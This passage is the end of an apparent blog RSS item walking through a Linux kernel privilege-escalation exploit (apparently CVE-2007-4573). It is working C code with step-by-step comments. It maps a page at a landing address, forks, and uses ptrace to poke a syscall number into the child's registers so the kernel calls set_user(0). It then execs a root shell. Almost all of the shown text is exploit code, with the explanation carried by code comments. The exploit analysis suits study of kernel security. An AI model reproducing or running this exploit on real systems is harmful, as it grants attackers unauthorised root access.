        if((signed long)mmap((void*)(landing&amp;~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) &lt; 0) {
                perror("mmap");
                exit(-1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
         */

        pid_t child;
        child = fork();
        /*
          We fork into two processes. The parent will ptrace the child, and
          the child will execute the `int 0x80` syscall.
         */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                 */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
                /*
                  All the parent needs to do is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.
                 */
        }
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

